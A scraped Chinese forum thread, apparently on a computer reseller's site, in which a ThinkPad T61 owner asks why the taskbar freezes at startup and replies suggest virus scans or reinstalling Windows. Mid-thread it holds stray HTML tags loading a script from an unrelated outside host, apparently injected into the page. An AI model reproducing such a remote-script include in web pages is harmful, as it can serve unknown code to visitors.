开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

电脑一开机任务栏就假死,必须重启

我的电脑有时候一开机任务栏就假死,任务栏有很多图标没启动起来,鼠标在桌面上任何部位操作都没有反应,移到任务栏上时马上变成小漏斗,这种情况持续很久都没反应,必须按Ctrl+Alt+Delete注销或重启下才有可能变好,有时要重启好几次才变好。过年时刚买的,买回来就发现这个问题,当时以为是硬盘保护的灵敏度调的太高了,现在调到50%,还是会出现这种情况,请各位给出个主意,这问题怎么解决?
另注:本本是T61的,每次出现这种情况,选择注销或重启后,电脑出弹出两个结束进程对话框,一个是Tpshocks.exe,一个是explorer.exe,各位帮忙分析分析,这是怎么回事啊?
杀毒,重做系统
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

我也碰到过此类情况,据说要把user用户删除自己重新建立一个,或者重装系统
但我没试过,不知道效果

有个小图标

楼主问题解决了吗?
我又出现同样的问题了,开机任务栏就死机,而且在任务栏的右边出现了一个"小电脑左上角有三个风扇的小图标".只能再次手动重起.如果能正常开机情况下就没有这个小图标
请问是不是风扇坏了啊?这是什么图标啊?该怎么解决?
把外设包括网线全部拔掉 启动好后检查启动项有没有异常启动程序 检查不出来就杀毒 重装  重装是最有效的方法